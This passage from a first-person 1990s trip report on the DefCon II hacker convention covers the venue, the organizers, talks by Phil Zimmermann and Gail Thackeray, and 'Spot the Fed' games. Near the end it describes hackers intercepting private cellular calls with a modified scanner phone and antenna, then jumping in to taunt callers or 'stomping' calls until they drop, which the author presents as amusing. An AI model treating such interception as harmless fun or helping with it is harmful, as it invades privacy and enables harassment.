eat" room: "The Sahara's buffet is the worst in town; worse than Circus Circus." But since I had left my taste buds at 37,000 feet along with schrapneled pieces of my inner ear, I sought out sustenance only to keep me alive another 24 hours. By mid afternoon, I had convinced myself that outside was not the place to be. After only eighteen minutes of 120 sidewalk egg- cooking degrees, the hot desert winds took what was left of my breath away and with no functioning airways as it was, I knew this was a big mistake. So, hacker convention, ready or not, here I come. Now, you have to keep in mind that Las Vegas floor plans are designed with a singular purpose in mind. No matter where you need to go, from Point A to Point B or Point C or D or anywhere, the traffic control regulations mandated by the local police and banks require that you walk by a minimum of 4,350 slot machines, 187 gaming tables of various persuasions and no less than 17 bars. have they no remorse? Madison Avenue ad execs tale heed! . So, lest I spend the next 40 years of my life in circular pursuit of a sign-less hacker convention losing every last farthing I inheroted from dead Englishmen, I asked for the their well hidden location at the hotel lobby. "What hackers?" There goes that nasty photon triggered neuron depletion again. "The computer hackers." "What computer hackers. We don't have no stinking hackers . . ." Desk clerk humor, my oxymoron for the week. I tried the name: DefCon II. "Are we going to war?" one ex-military Uzi-wielding guard said recognizing the etymology of the term. "Yesh, it's true" I used my most convincing tone. "The Khasakstanis are coming with nuclear tipped lances riding hundred foot tall horses. Paris has already fallen. Berlin is in ruins. Aren't you on the list to defend this graet land?" "Sure as shit am!" He scampered off to the nearest phone in an effort to be the first on the front lines. Neuron deficiency beyong surgical repair.. I slithered down umpteen hallways and casino aisles lost in the jungleof jingling change. Where the hell are the hackers? "They must be there," another neuron-impoverished Saharan employee said as he pointed towards a set of escalators at the very far end of the casino. All the way at the end of the almost 1/4 mile trek through Sodom and Gonorrhea an 'up' escalator promised to take me to hackerdom. Saved at last. Upstairs. A conference looking area. No signs anywhere, save one of those little black Velcro-like stick-em signs where you can press on white block letters. No Mo Feds I must be getting close. Aha, a maintenance person; I'll ask him. "What hackers? What's DefCon." Back downstairs, through the casino, to the front desk, back through the casino, up the same escalator again. Room One I was told. Room One was empty. Figures. But, at the end of a hallway, past the men's room and the phones, and around behind Room One I saw what I was looking for: a couple of dozen T-shirted, Seattle grunged out kids (read: under 30) sitting at uncovered six foot folding tables hawking their DefCon II clothing, sucking on Heinekens and amusing themselves with widely strewn backpacks and computers and cell phones. I had arrived! * * * * You know, regular old suit and tie conferences could learn a thing or two from Jeff Moss, the man behind DefCon II. No fancy badge making equipment; no $75 per hour union labor built registration desks; no big signs proclaiming the wealth of knowledge to be gained by signing up early. Just a couple of kids with a sheet of paper and a laptop. It turned out I was expected. They handed me my badge and what a badge it was. I'm color blind, but this badge put any psychedelically induced spectral display to shame. In fact it was a close match to the Sahara's mid 60's tasteless casino carpeting which is so chosen as to hide the most disgusting regurgative blessing. But better and classier. The neat thing was, you could (in fact had to) fill out your own badge once your name was crossed off the piece of paper that represented the attendee list. Name: Subject of Interest: E-Mail: Fill it out any way you want. Real name, fake name, alias, handle - it really doesn't matter cause the hacker underground ethic encourages anonymity. "We'd rather not know who you are anyway, unless you're a Fed. Are you a Fed?" A couple of lucky hackers wore the ultimate badge of honor. An "I Spotted A Fed" T-shirt. This elite group sat or lay on the ground watching and scouring the registration area for signs that someone, anyone, was a Fed. They really didn't care or not if you were a Fed - they wanted the free T-shirt and the peer respect that it brought. I'm over 30 (OK, over 35) and more than a few times (OK, a little over 40) I had to vehemently deny being a Fed. Finally Jeff Moss came to the rescue. "He's not a Fed. He's a security guy and a writer." "Ugh! That's worse. Can I get a T-shirt cause he's a writer?" No way hacker-breath. Jeff. Jeff Moss. Not what I expected. I went to school with a thousand Jeff Mosses. While I had hair down to my waist, wearing paisley leather fringe jackets and striped bell bottoms so wide I appeared to be standing on two inverted ice cream cones, the Jeff Mosses of the world kept their parents proud. Short, shsort cropped hair, acceented by an ashen pall and clothes I stlll wouldn't wear today. They could get away with anything cause they didn't look the part of radical chic. Jeff, I really like Jeff: he doesn't look like what he represents. Bruce Edelstein, (now of HP fame) used to work for me. He was hipper than hip but looked squarer than square. Now today that doesn't mean as much as it used to, but we ex-30-somethings have a hard time forgetting what rebellion was about. (I was suspended 17 times in the first semester of 10th grade for wearing jeans.) Jeff would fit into a Corporate Board Meeting if he wore the right suit and uttered the right eloquencies: Yes, that's it: A young Tom Hanks. Right. I used to hate Tom Hanks (Splach, how fucking stupid except for the TV-picture tube splitting squeals) but I've come to respect the hell out of him as an actor. Jeff never had to pass through that first phase. I instantly liked him and certainly respect his ability to pull off a full fledged conference for only $5000. You read right. Five grand and off to Vegas with 300 of your closest personal friends, Feds in tow, for a weekend of electronic debauchery. "A few hundred for the brochure, a few hundred hear, a ton in phone bills, yeah, about $5000 if no one does any damage." Big time security shows cost $200,000 and up. I can honestly say without meaning anything pejorative at any of my friends and busienss acquaintances, that I do not learn 40 times as much at the 'real' shows. Something is definitely out of whack here. Suits want to see suits. Suits want to see fancy. Suits want to see form, substance be damned. Suits should take a lesson from my friend Jeff. * * * * * I again suffered through a tasteless Saharan buffer dinner which cost me a whopping $7.95. I hate grits -buttered sand is what I call them - but in this case might well have been preferable. Somehow I coerced a few hackers to join me in the ritualistic slaughter of our taste buds and torture of our intestines. They were not pleased with my choice of dining, but then who gives a shit? I couldn't anything anyway. Tough. To keep out minds off of the food we talked about something much more pleasant: the recent round of attacks on Pentagon computers and networks. "Are the same people involved as in the sniffing attacks earlier this year?" I asked my triad of dinner mates. "Indubitably." "And what's the reaction from the underground - other hackers?" Coughs, sniffs. Derivie visual feedback. Sneers. The finger. "We can't stand 'em. They're making it bad for everybody." Two fingers. By and large the DefCon II hackers are what I call 'good hackers' who hack, and maybe crack some systems upon occasion, but aren't what I refer to as Information Warriors in the bad sense of the word. This group claimed to extol the same position as most of the underground would: the Pentagon sniffing crackers - or whoever who is assaulting thousands of computers on the net - must be stopped. "Scum bags, that what they are." I asked that they not sugarcoat their feelings on my behalf. I can take it. "These fuckers are beyond belief; they're mean and don't give a shit how much damage they do." We played with our food only to indulge inthe single most palatable edible on display: ice cream with gobs of chocolate syrup with a side of coffee. . The big question was, what to do? The authorities are certainly looking for a legal response; perhaps another Mitnick or Phiber Optik. Much of the underground cheered when Mark Abene and others from the reknowned Masters of Destruction went to spend a vacation at the expense of the Feds. The MoD was up to no good and despite Abene's cries that there was no such thing as the MoD, he lost and was put away. However many hackers believe as I do, that sending Phiber to jail for hacking was the wrong punishment. Jail time won't solve anything nor cure a hacker from his first love. One might as well try to cure a hungry man from eating: No, Mark did wrong, but sending him to jail was wrong, too. The Feds and local computer cops and the courts have to come up with punishments appropriate to the crime. Cyber-crimes (or cyber-errors) should not be rewarded by a trip to an all male hotel where the favorite toy is a phallically carved bar of soap. On the other hand, hackers in general are so incensed over the recent swell of headline grabbing break-ins, and law enforcement has thus far appeared to be impotent, ("These guys are good.") that many are searching for alternative means of retribution. "An IRA style knee capping is in order," said one. "That's not good enough, not enough pain," chimed in another. (Sip, sip. I can almost taste the coffee.) "Are you guys serious?" I asked. Violence? You? I thought I knew them better than that. I know a lot of hackers, none that I know of is violent, and this extreme Pensacola retributition attitude seemed tottally out of character. "You really wouldn't do that, would you?" My dinner companions were so upset and they claimed to echo the sentiment of all good-hackers in good standing, that yes, this was a viable consideration. "The Feds aren't doing it, so what choice do we have? I've heard talk about taking up a collection to pay for a hit man . . ." Laughter around, but nervous laughter. "You wouldn't. . ." I insisted. "Well, probably not us, but that doesn't mean someone else doesn't won't do it." "So you know who's behind this whole thing." "Fucking-A we do," said yet another hacker chomping at the bit. He was obviously envisioning himself with a baseball bat in his hand. "So do the Feds." So now I find myself in the dilemma of publishing the open secret of who's behind the Internet sniffing and Pentagon break ins, but after talking to people from both the underground and law enforcement, I think I'll hold off awhile It serves no immediate purpose other than to warn off the offenders, and none of us want that. Obviously all is not well in hacker-dom. * * * * * The registration area was beyond full; computers, backpacks everywhere, hundreds of what I have to refer to as kids and a fair number of above ground security people. Padgett Peterson of Martin Marietta was going to talk about viruses, Sara Gorden on privacy, Mark Aldrich is a security guy from DC., and a bunch of other folks I see on the seemingly endless security trade show circuit. Jeff Moss had marketed himself and the show excellently. Los Angeles send a TV crew, John Markoff from the New York Times popped in as did a writer from Business Week. (And of course, yours truly.) Of the 360 registrees ("Plus whoever snuck in," added Jeff) I guess about 20% were so-called legitimate security people. That's not to belittle the mid-20's folks who came not because they were hackers, but because they like computers. Period. They hack for themselves and not on other systems, but DefCon II offered something for everyone. I remember 25 years ago how my parents hated the way I dressed for school or concerts or just to hang out: God forbid! We wore those damned jeans and T-shirts and sneakers or boots! "Why can't you dress like a human being," my mother admonished me day after day, year after year. So I had to check myself because I can't relate to Seattle grunge-ware. I'm just too damned old to wear shirts that fit like kilts or sequin crusted S&M leather straps. Other than the visual cacophony of dress, every single hacker/phreak that I met exceeded my expectations in the area of deportment. These are not wild kids on a rampage. The stories of drug-induced frenzies and peeing in the hallways and tossing entire rooms of furniture out of the window that emanated from the HoHoCons seemed a million miles away. This was admittedly an opportunity to party, but not to excess. There was work to be done, lessons to be learned and new friends to make. So getting snot nosed drunk or ripped to the tits or Ecstatically high was just not part of the equation. Not here. Now Vegas offers something quite distinct from other cities which host security or other conventions. At a Hyatt or a Hilton or any other fancy-ass over priced hotel, beers run $4 or $5 a crack plus you're expected to tip the black tied minimum wage worker for popping the top. The Sahara (for all of the other indignities we had to suffer) sosmewhat redeemed itself by offering an infinite supply of $1 Heinekens. Despite hundreds of beer bottle spread around the huge conference area (the hotel was definitely stingy in the garbage pail business) public drunkenness was totally absent. Party yes. Out of control? No way. Kudos! Surprisingly, a fair number of women (girls) attended. A handful were there 'for the ride' but others . . . whoa! they know their shit. I hope that's not sexist; merely an observation. I run around so few technically fluent ladies it's just a gut reaction. I wish there were more. In a former life, I owned a TV/Record production company called Nashville North. We specialized in country rock taking advantage of the Urban Cowboy fad in the late 1970's. Our crew of producers and engineers consisted of the "Nashville Angels." And boy what a ruckus they would cause when we recorded Charlie Daniels or Hank Williams: they were stunning. Susan produced and was a double fo Jacqueline Smith; we called Sally "Sabrina" because of her boyish appearance and resemblance to Kate Jackson. A super engineer. And there was Rubia Bomba, the Blond Bombshell, Sherra, who I eventually married: she knew country music inside and out - after all she came from Nashville in the first place. When we would be scheduled to record an act for live radio, some huge famous country act like Asleep at The Wheel of Merle Haggard or Johnny Paycheck or Vassar Clements, she would wince in disbelief when we cried, "who's that?" Needless to say, she knew the songs, the cues and the words. They all sounded alike. Country Music? Ecch. (So I learned.) At any rate, ladies, we're equal opportunity offenders. C'mon down and let's get technical. As the throngs pressed to register, I saw an old friend, Erik Bloodaxe. I've known him for several years now and he's even come over to baby sit the kids when he's in town. (Good practice.) Erik is about as famous as they come in the world of hackers. Above ground the authorities investigated him for his alleged participation in cyber crimes: after all, he was one of the founders of the Legion of Doom, and so, by default, he must have done something wrong. Never prosecuted, Erik Bloodaxe lives in infamy amongst his peers. To belay any naysayers, Erik appeared on every single T-shirt there. "I Only Hack For Money," Erik Bloodaxe proclaimed dozens of shirts wandering through the surveillance laden casinos. His is a name that will live in infamy. So I yelled out, "Hey Chris!" He gave his net-name to the desk/table registrar. "Erik Bloodaxe." "Erik Bloodaxe?" piped up an excited high pitched mail voice. "Where?" People pointed at Chris who was about to be embarrassingly amused by sweet little tubby Novocain who practically bowed at Chris's feet in reverence. "You're Erik Bloodaxe?" Novocain said with nervous awe - eyes gleaming up at Chris's ruddy skin and blond pony-tail. "Yeah," Chris said in the most off handed way possible. For people who don't know him this might be interpreted as arrogance (and yes there is that) but he also has trouble publicly accepting the fame and respect that his endearing next-generation teenage fans pour on him. "Wow!" Novocain said with elegance and panache. "You're Erik Bloodaxe." We'd just been through that said Chris's eyes. "Yeah." "Wow, well, um, I . . . ah . . . you're . . . I mean, wow, you're the best." What does Sylvia Jane Miller from Rumpsteer, Iowa say to a movie star? This about covered it. The Midwest meets Madonna. "Wow!" Only here it's Novocain meets Cyber Christ himself. Like any other security show or conference or convention there is a kickoff, generally with a speech. And DefCon II was no exception. Except. Most conventional conventions (ConCons) start at 7:30 or 8:00 AM because, well I don't know exactly why, except that' when so- called suits are expected to show up in their cubicles. DefCon, on the other hand, was scheduled to start at 10PM on Friday night when most hakcers show up for work. Most everyone had arrived and we were anxiously awaiting the opening ceremonies. But, here is where Jeff's lack of experience came in. The kick- off speaker was supposed to be Mark Ludwig of virus writing fame and controversy. But, he wasn't there! He had jet lag. "From Phoenix?" I exclaimed in mock horror to which nearby hackers saw the absurdity of a 45 minute flight jet lag. Mark has a small frame and looks, well, downright weak, so I figured maybe flying and his constitution just didn't get along and he was massaging his swollen adenoids in his room. "Oh, no! He's just come in from Australia . . ." Well that explains it, alright! Sorry for the aspersions, Mark. But Jeff didn't have a back up plan. He was screwed. Almost four hundred people in the audience and nothing to tell them. So, and I can't quite believe it, one human being who had obviously never stood in front of a live audience before got up in an impromptu attempt at stand up comedy. The audience was ready for almost anything entertaining but this guy wasn't. Admittedly it was a tough spot, but . . . "How do you turn a 496 into an 8088?" "Add Windows." Groan. Groan. "What's this?" Picture the middle three fingers of your right hand wiggling madly. "An encrypted this!" Now hold out just the middle finger. Groan. Groan. "What's this?" Spread your legs slightly apart, extend both hands to the front and move them around quickly in small circles "Group Air Mouse." Groan. The evening groaned on with no Mark nor any able sharp witted comedian in sight. Phil Zimmerman wrote PGP and is a God, if not Cyber-Christ himself to much of the global electronic world. Preferring to call himself a folk hero (even the Wall Street Journal used that term) Phil's diminutive height combined with a few too many pounds and a sweet as sweet can be smile earn him the title of Pillsbury Dough Boy look alike. Phil is simply too nice a guy to be embroiled in a Federal investigation to determine if he broke the law by having PGP put on a net site. You see, the Feds still think they can control Cyberspace, and thereby maintain antique export laws: "Thou shalt not export crypto without our approval" sayeth the NSA using the Department of Commerce as a whipping boy mouth piece. So now Phil faces 41-51 months of mandatory jail time if prosecuted and convicted of these absurd laws. Flying in from Colorado, his appearance was anxiously awaited. "He's really coming?" " I wonder what he's like?" (Like eevryone else, fool, just different.) When he did arrive, his shit- eating grin which really isn't a shit-eating grin, it's just Phil's own patented grin, preceeded him down the hallway. "Here he is!" "It's Phil Zimmerman." Get down and bow. "Hey, Phil the PGP dude is here." He was instantly surrounded by those who recognize him and by both those who don't but want to feel like part of the in-crowd. Chat chat, shit-eating grin, good war stories and G-rated pleasantries. Phil was doing what he does best: building up the folk hero image of himself. His engaging personality (even though he can't snorkel to save his ass) mesmerized the young-uns of the group. "You're Phil?" "Yeah." No arrogance, just a warm country shit-eating grin that's not really shit-eating. Just Phil being Phil. He plays the part perfectly. Despite the attention, the fame, the glory (money? nah . . .) the notoriety and the displeased eyes of onlooking Computer Cops who really do believe he belongs in jail for 4 years, Phil had a problem tonight. A real problem. "I don't have a room!" he quietly told Jeff at the desk. "They say I'm not registered." Np panic. Just a shit-eating grin that's not a shit-eating grin and hand the problem over the experts: in this case Jeff Moss. Back to his endearing fans. Phil is so damned kind I actually saw him giving Cryptography 101 lessons on the corner of a T-shirt encrusted table. "This is plaintext and this is crypto. A key is like a key to your hotel room . . . " If Phil had a hotel room. Someone had screwed up. Damn computers. So the search was on. What had happened to Phil's room? Jeff is scrambling and trying to get the hotel to rectify the situation Everyone was abuzz. Phil, the crypto-God himself was left out in the cold. What would he do? When suddenly, out of the din in the halls, we heard one voice above all the rest: "Phil can sleep with me!" Silence. Dead stone cold silence. Haunting silence like right after an earthquake and even the grubs and millipedes are so shaken they have nothing to say. Silence. The poor kid who had somehow instructed his brain to utter the words and permitted them to rise through his esophagus and out over his lips stood the object of awe, incredulity and mental question marks. He must have thought to himself, "what's everyone staring at? What's going on? Let me in on it." For the longest 10 seconds in the history of civilization he had absolutely no clue that he was the target of attention. A handful of people even took two or three steps back, just in case. Just in case of what was never openly discussed, but nonetheless, just in case. And then the brain kicked in and a weak sheepish smile of guilt overcame this cute acne-free baby-butt smooth-faced hacker who had certainly never had a shave, and was barely old enough to steer his own pram. "Ohhhhhh . . . . noooooo," he said barely louder than a whisper. "That' not what I mean!" I nearly peed laughing so hard in unison with a score of hackers who agreed that these misspoken words put this guy in the unenviable position of being the recipient of a weekend of eternal politically incorrect ridicule. "Yeah, right. We know what you mean . . " "No really . . ." he pleaded as the verbal assaults on his alleged sexual preferences were slung one after the other. This poor kid never read Shakespeare: "He who doth protest too much . . ." If we couldn't have a great kickoff speech, or comedian, this would have to do. The majority of the evening was spent making acquaintances: "Hi, I'm Jim. Oops, I mean 'Septic Tank," was greeted with "Oh, you're Septic. I'm Sour Milk." (Vive la difference!) People who know each other electronically are as surprised to meet their counterparts as are first daters who are in love with the voice at the other end of the phone. "Giving good phone" implies one thing while "Having a great keystroke" just might mean another. The din of the crowd was generally penetrated by the sounds of a quasi-pornographic Japanese high tech toon of questionable socially redeeming value which a majority of the crowd appeared to both enjoy and understand. I am guilty of neither by reason of antiquity. And so it goes. * * * * * Phil Zimmerman must have gotten a room and some sleep because at 10AM (or closely thereafter) he gave a rousing (some might say incendiary) speech strongly attacking the government's nearly indefensible position on export control I was really impressed. Knowing Phil for some time, this was the first time I ever heard him speak and he did quite an admirable job. He ad libs, talks about what he want to talk about and does so in a compelling and emotional way. His ass is on the line and he should be emotional about it. The audience, indeed much of counter culture Cyberspace loves Phil and just about anything he has to say. His affable 40-something attorney from Colorado, Phil DuBois was there to both enjoy the festivities and, I'm sure, to keep tabs on Phil's vocalizations. Phil is almost too honest and open for his own good. Rounds and rounds of sincere appreciation. Hey kids, now it's time for another round of Spot The Fed. Here's your chance to win one of these wonderful "I Spotted A Fed" T-shirts. and all you have to do is ID a fed and it's yours. Look around you? Is he a Fed? Is she under cover or under the covers? Heh, heh. Spot the Fed and win a prize. This one-size- fits-all XXX Large T-shirt is yours if you Spot the Fed. I had to keep silent. That would have been cheating. I hang out on both sides and have a reputation to maintain. "Hey, I see one" screeched a female voice (or parhaps it was Phil's young admirer) from the left side of the 400+ seat ballroom. Chaos! Where? Where? Where's the fed? Like when Jose Consenko hits one towards the center field fence and 70,000 screaming fans stand on their seats to get a better view of a ball 1/4 mile away flying at 150 miles per hour, this crowd stood like Lemmings in view of Valhalla the Cliff to espy the Fed. Where's the Fed? Jeff jumped off the stage in anxious anticipation that yet another anti-freedom-repressive law enforcement person had blown his cover. Where's the Fed? Jeff is searching for the accuser and the accused. Where's the Fed? Craned necks as far as the eye can see; no better than rubber neckers on Highway 95 looking for steams of blood and misplaced body parts they half expected a Fed to be as distinctly obvious as Quasimoto skulking under the Gorgoyled parapits of Notre Dame. No such like. They look like you and me. (Not me.) Where's the Fed? He's getting closer, closer to the Fed. Is it a Fed? Are you a Fed? C'mon, fess up. You're a a fed. Nailed. Busted. Psyche! Here's your T-shirt. More fun than Monty Hall bringing out aliens from behind Door #3 on the X-Files. Good clean fun. But they didn't get 'em all. A couple of them were real good. Must have been dressed like an Hawaiian surf bum or banshee from Hellfire, Oregon. Kudos to those Feds I know never got spotted. Next year, guys. There's always next year. Phil's notoriety and the presence of the Phoenix,Arizona prosecutor who was largely responsible for the dubiously effective or righteous Operation Sun Devil, Gail Thackeray ("I change job every 4 years or so - right after an election") brought out the media. The LA TV station thought they might have the makings of a story and sent a film crew for the event. "They're Feds. The ones with the cameras are Feds. I know it. Go ask 'em." No need. Not. "Put away that camera." At hacking events it's proper etiquette to ask if people are camera shy before shooting. The guy that I was sitting next to buried his face in his hands to avoid being captured on video tape. "What are you; a Fed or a felon?" I had to ask. "What's the difference," his said. "They're the same thing." So which was it, I wondered. For the truly paranoid by the truly paranoid. "Get that thing outta here," he motioned to the film crew who willingly obliged by turning off the lights. "They're really Feds," he whispered to me loud enough for the row in front and behind us to hear. I moved on. Can't take chances with personal safety when I have kids to feed. Fed or felon, he scared me. Gail Thackeray: was the next act on stage. She was less in agreement about Phil Zimmerman than probably anyone (except the undetected Feds) in the audience. She, as expected, endorsed much of the law enforcement programs that revolve around various key management (escrow) schemes. Phil recalls a letter from Burma that describe how the freedom fighters use PGP to defend themselves against repression. He cites the letter from Latvia that says electronic freedom as offered by PGP is one of the only hopes for the future of a free Russia. Gail empathizes but sees trouble closer to home. Terrorism a la World Trade Center, or rocket launchers at O'Hare Airport, or little girl snuff films in Richmond, Virginia, or the attempt to poison the water supply outside of Boston. These are the real threats to America in the post Cold War era. "What about our personal privacy!" cries a voice. "We don't want the government listening in. It's Big Brother 10 years behind schedule." Gail is amused. She knew it would be a tough audience and has been through it before. She is not shaken in the least. "I've read your mail," she responds. "Its not all that interesting." The audience appreciates a good repartee. "You gotta pay me to do this, and frankly most of it is pretty boring." She successful made her point and kept the audience laughing all the way. She then proceeded to tell that as she sees it, "The expectation of privacy isn't real." I really don't like hearing this for I believe in the need for an Electronic Bill of Rights. I simply think she's wrong. "History is clear," she said "the ability to listen in used to be limited to the very few. The telegraph was essentially a party line and still today in some rural areas communications have never been private. Why should we change it now?" "Gail, you're so full of shit!" A loud voice bellowed from next me again. Boy can I pick seats. "You know perfectly well that cops abuse the laws and this will just make their jobs easier. Once people find a way to escape tyranny you all want to bring it right back again. This is revolution and you're scared of losing. This kind of puke scum you're vomiting disgusts me. I just can't take it any more. " Yeah, right on. Scattered applause. While this 'gent' may have stated what was on many minds, his manner was most unbefitting a conference and indeed, even DefCon II. This was too rude even for a hacker get-together. The man with the overbearing comments sat down apologizing. "She just gets me going, she really does. Really pisses me off when she goes on like about how clean the Feds are. She knows better than to run diarrhea of the mouth like that." "You know," she continued. "Right across the street is a Spy Shop. One of those retail stores where you can buy bugs and taps and eavesdropping equipment?" The audience silently nodded. "We as law enforcement are prohibited by law from shopping there and buying those same things anyone else can. We're losing on that front." Cheers. Screw the Feds. I don't agree with ever thing that Gail says, but she is a compelling speaker; she believes in what she says. But I do agree with her on the difficulty of forensic evidence in computer cases." "I got really mad," she said. "I was reading a magazine and there was an ad for United, you know, the employee owned airline. And it was a beautiful ad, hundred of employees standing in front of a brand new great big jet. All smiling and happy." Gail then frowned deeply. "Some stockholder ought to sue them for misleading advertising." This was more like it! Go, Gail! "I started to look at the picture carefully and I noticed this unmistakably fat lady in a pink dress. And then over a few persons. . .guess what? The same fat lady in pink." Roars of laughter and applause. Her point? What seems real may not be real at all, and with a few hundred dollars in software and a little practice, most anyone can build a false reality digitally. Her time was up but the audience wanted more. She was mobbed for eternity by hackers who fight her tooth and nail but respect her comportment enough to make the disagreements lively, partisan, entertaining, but with respect. Respectful hackers. No HoHoCon orgies; merely verbal barbs with no solution. Everyone knew that, but it's the battle that counts. More security conference should be this open, this honest and informative, with all kinds of people with all kinds of opinions. That is how we, and I, learn. Listen and learn. And all for $5000 no less, plus a paltry $15 entrance fee. * * * * * The afternoon sessions were filled with a mixture of anti-government, pro-privacy advocacy, virus workshops and such by both under and above ground folks. Padgett Peterson's knowledge of viruses is deep and he spread the same wisdom as his does in so called legitimate circles. Knowledge is knowledge, and better accurate than wrong. It's often surprising to see how people will voice the same opinion in varying degree of intensity depending upon their audience. Mark Aldrich of General Research Corp. in the Washington area made a statement that I doubt I would hear at a ConCon. "Fear your government that fears your crypto. Use crypto as weapon." Sara Gordon's panel discussion on crypto and privacy and related topics fueled the audience's general anti-fed attitude. "I was bugged by the Feds." "So was I?" "What can we do about it." "Yeah, they listen in on my phones, too. I can hear the clicks." Right. As Mark so succinctly put it, "if the government wants to bug you, you'll never know. They're that good.". That kind of shut up the dilettante paranoids in the group, albeit mumbling that they just knew that they were the victim of one of the 900 or so court approved wire taps last year. Right. I think Gail was right: some of you guys are too boring to be believed. The afternoon edition of the Spot A Fed contest took us on the run. I actually succombed to their enthusiasm and the lack of mybetter judgement and followed a group of 8 or 10 to unmask an unmarked white van in the parking lot. "It's the Feds." "How do you know?" "Oh, it's the Feds alright." "How do you know." "It's a white van and the intelligence services use white vans." "What are you going to do?" "Bust 'em." "Bust 'em for what?" "For being Feds." This motley crew traipsed through the mile long casino, trodding upon the ugly tartan/paisley carpets so obnoxiously loud a blind man could cry "Uncle!", into the Hall of Overpriced Shoppes through the lobby and over to the parking garage. We had to have $100,000 of surveillance gear in tow: (enough to detect the plant Pluto fart in b-flat), Radio receivers and eavesdropping equipment were courtesy of my pal Mike Peros. The goal was, if this was a Fed van, we could hear it. I don't think so, but I go for the ride and a few minutes of reprieve away from the conference hall. As we near, the excitement grows among the more paranoid who are trying to instill their own mental foibles into their companions and sheer terror in normal old Vegas visitors who have no idea what they've walked into. Feds? Not. Surrepticious radio transmissions? Just hotel security tracking the movements of 8 or 10 paranoids (and one writer with nothing else todo for a half hour) into a parking garage which has more cameras than NBC. Feds? Of course not. Don't be ridiculous. * * * * * To say nothing worthwhile occurred until 11PM that evening would be lying, but this thing, this DefCon II thing, was turning into what I would have called 25 years ago, a Love-In. The participants were giddy from the event, the camaraderie, the $1 Heinekens and the hacking. The Sahara was actually pretty good about it. Jeff got the conference space for free because he guaranteed that at least 100 hotel rooms would be booked by "computer enthusiasts coming to a small computer conference." Little did the hotel know that half the crowd was too young to drink, to broke to gamble, and conspicuous enough to ward off legitimate clients. But a deal's a deal. The hotel operators went out of their way and allegedly gave the hackers permission to hack through the PBX in order to provide a SLPP connection. "Just put it back the way you found it when you're done," was the hotel's only and quite reasonable request. In my day an equivalent event producing an equivalent social non- drug induced high would have been achieved by tossing a Frisbee to Grace Slick (Lead singer Jefferson Airplane) and have her throw it back. We didn't have the kind of technology that today's rebellious age has. We had the Beatles and Jimi Hendrix, safe sex (kinda), safe drugs (well, maybe a little safer) and a cause. But no technology to speak of. When I was on the publishing staff of the New York City Free Press in 1968/9 we wrote our anti- establishment diatribes by hand. By hand! And then we went down to a dark office late at night to use their typesetting gear when it was idle. It took no more than a blushing glance around the room to realize that we impressionable teens were publishing our political extremisms on equipment courtesy of Al Goldstein and Screw magazine. Now that was an education. DefCon II was a Love-In, technology and all. Come 11PM yet another speaker canceled and I offered to chat to the crowd for a half hour or so on Van Eck radiation; the emissions from CRT's that make video screens readable from a distance. Now this wasn't a fill in at 5PM or anything. Sessions reconvened at 11PM and I spoke to a full audience who were there to get a midnight lesson in cellular hacking. Most above ground types still believe that hacking is an acne- faced teenager, sucking on Jolt Cola, wolfing down pepperoni pizza and causing Corporate America no end of grief. To a certain extent some of this is true. But hacking is so much more. As Rop Gongrijjp, editor of Hacktic once told me, "hacking is disrespect of technology." It's going the extra mile to find out how things work. Many of the older hackers, those in their early 20's and older, are migrating from the conventional dial-em-up and break-in hacking image to the fine art of cellular hacking. How do these things work? What are the frequencies? How can I customize my phone? How many channels can I scan? The possibilities are endless as I soon learned. Jim and Bill (fake names) asked if I wanted to see a great demo. Sure! No names, they said. OK. No problem. In one of the several thousand hotel rooms at the Sahara was a pile of equipment to make an under budgedted FBI surveillance team insanely jeaous. There in the middle of the ridiculously filthy room that no doubt caused the maid to shudder, sat a log periodic antenna poised atop a strong and highly adjustable photographic-style tripod. Feeding the antenna was a hunk of coax attached to a cell phone's antenna jack. OK, so that's that? Free cell calls? No, much more. A second cell phone/scanner, an Oki 900 was modified and connected to a laptop computer. (This was the exact modification being discussed downstairs) Custom software that was freely distributed around DefCon scanned the data from the Oki and displayed the scanning activity. A pair of speakers then audibly broadcast the specific conversation. And in Vegas, you can imagine what was going over the open airwaves! A half dozen 'kids' sat around enthralled, each begging for his turn to, as Jim put it, "harass cellular users. Ppure and simple. Harassment. Stomp on the son of a bitch," he laughed, joined in by the others. When a 'good' conversation was detected, they entered the channel into the broadcasting cell phone and spoke. And talk they did. Essentially they turned 'private' conversations into wide- band free-for-alls. If they spoke for only a few seconds one or both of the parties could hear what was being said. If they talked for too long, the overpowering signal from the antenna would literally wipe out the chat: the cell switch reacted with an internal signal to shut down. Stomping, they called it. For those on the receiving end of the harassment, it must have sounded like the overbearing voice of God telling Noah how to build the Ark. "Noah?" "Who dat? "Noah?" "Who is that?" What terror lurks in the minds of boys . . . For those old enough to remember, stomping is no more a stunt than putting a 500 watt linear power amplifier on a CB radio and blasting nearby CB's to kingdom come. The truckers used to do it to 4-wheelers. When the police began monitoring CB channels "to protect and serve" they became the target of CB stomping. So what else is new? I gotta give it to them: these characters designed and built the software, modified the phones and put it all together and it works! Not bad on a $3 allowance and a 10th grade education. Now, I guess what they did may have been sort of illegal, or at least highly unethical and definitely, not nice. But I have to admit, some of what I witnessed was very, very, funny. I'm not advocating this kind of activity, but much like Candid Camera broke in to people's lives to capture their reactions, cellular hacking is similarly amusing. The hacker/phreaks particularly enjoyed breaking in on fighting couples. (I counted six impending divorces.) Almost without exception the man was in a car and the lady was at a fixed location; presumably, home. Him: "Where the hell have you been." Her: "Nowhere." Him: "Bullshit. Her: "Really honey . . ." Defensively. Him: "Who's with you?" Intense anger. Hacker: "Don't believe her. She's a whore." Him: "What was that?" Her: "What?" "That voice." "What voice?" Hacker: "Me you asshole. Can't you see she's playing you for a fool." "I know she is." He agrees. "What's that honey?" "I know he's there with you." "Who?" Incredulous. "Him . . . whoever you're fucking when I'm at work." Hacker: "Yeah, it's me." "Shit! Who the fuck is there?" "No one!" "I can hear him, he's there. You're both making fun of me . . ." Hacker: "She's laughing at you, man." "No shit. Who the fuck are you?" Hacker: "The guy who takes care of her when you can't, asshole." "That's it." Click. Drug dealers aren't immune to these antics. "Where's the meet?" "By the 7/11 on Tropicana." "You got it?" "You got the cash?" "Yeah, dude." "Be sure you do." Hacker: "He doesn't have the cash my man. He's gonna rip you off." "What?" "What?" Both sides heard the intruder's voice. "Who is that?" "What's that about a rip-off?" "This ain't no rip-off man." Hacker: "Yes it is. Tell 'em the truth. You gonna take his drugs and shoot his ass. Right? Tell 'em." "You gonna rip me off?" "No, man!" "Your homeboy says you gonna try and rip me off?" "What home boy?" Hacker: "Me, you bozo drug freak. Don't you know that shit can kill you?" Click. Good samaritanism pays off upon occasion. "Honey, hurry up." "I'm on the freeway. I'm coming." Hacker: "He's late. Let's save her ass." "What was that?" "What did you say honey?" "He said he was going to save your ass." "Who 